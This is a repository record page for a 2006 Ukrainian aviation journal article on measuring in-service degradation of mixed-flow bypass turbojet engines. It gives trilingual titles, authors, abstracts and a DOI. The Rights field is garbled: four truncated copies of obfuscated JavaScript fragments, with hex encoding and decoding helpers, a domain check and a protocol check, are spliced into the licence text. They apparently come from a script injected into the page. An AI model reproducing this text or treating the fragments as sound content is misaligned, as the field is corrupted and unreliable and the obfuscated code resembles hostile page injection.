Record Details

ВИЗНАЧЕННЯ СТУПЕНЯ ДЕГРАДАЦІЇ ТЕХНІЧНОГО СТАНУ ТУРБОРЕАКТИВНИХ ДВОКОНТУРНИХ ДВИГУНІВ ЗІ ЗМІШУВАННЯМ ПОТОКІВ В УМОВАХ ЕКСПЛУАТАЦІЇ

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title ВИЗНАЧЕННЯ СТУПЕНЯ ДЕГРАДАЦІЇ ТЕХНІЧНОГО СТАНУ ТУРБОРЕАКТИВНИХ ДВОКОНТУРНИХ ДВИГУНІВ ЗІ ЗМІШУВАННЯМ ПОТОКІВ В УМОВАХ ЕКСПЛУАТАЦІЇ
Determine the degree of degradation of the technical state of turbojet engines with double mixing flows in operating conditions
Oпределения степени деградации технического состояния турбореактивных двухконтурных двигателей со смешением потоков в условиях эксплуатации
 
Creator Дмитрієв, С.О.; НАУ, кафедра збереження льотної придатності авіаційної техніки
Сахно, С.Г.; НАУ, кафедра збереження льотної придатності авіаційної техніки
Степаненко, В.М.; НАУ, кафедра авіаційних двигунів
Тарасенко, А.В.; НАУ, кафедра авіаційних двигунів
 
Subject


 
Description  Розглянуто метод визначення ступеня деградації технічного стану турбореактивних двоконтурних двигунів зі змішуванням потоків в експлуатації. Зазначений метод дозволяє визначити технічний стан двигуна, аналізуючи зміну його сили тяги,  питомої витрати палива, ефективного коефіцієнта корисної дії і відносних відхилень коефіцієнта корисної дії компресора і турбіни в експлуатації під час наземних випробувань.
 The method of degradation rate definition of bypass turbojet engine with mixed flows in operation is considered. The specified method allows determining technical state of engine by analyzing its thrust, specific fuel consumption, effective efficiency and relative deviations of efficiency of both compressor and turbine in operation during ground tests.
 Рассмотрен метод определения степени деградации технического состояния турбореактивных двухконтурных двигателей со смешением потоков в эксплуатации. Указанный метод позволяет определить техническое состояние двигателя, анализируя изменение его силы тяги, удельного расхода топлива, эффективного коэффициента полезного действия и относительных отклонений коэффициента полезного действия компрессора и турбины в эксплуатации во время наземных испытаний.
 
Publisher National Aviation University
 
Contributor


 
Date 2006-04-01
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/1409
10.18372/2306-1472.30.1409
 
Source Proceedings of the National Aviation University; Том 30, № 4 (2006); 67-70
Вестник Национального авиационного университета; Том 30, № 4 (2006); 67-70
Вісник Національного Авіаційного Університету; Том 30, № 4 (2006); 67-70
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ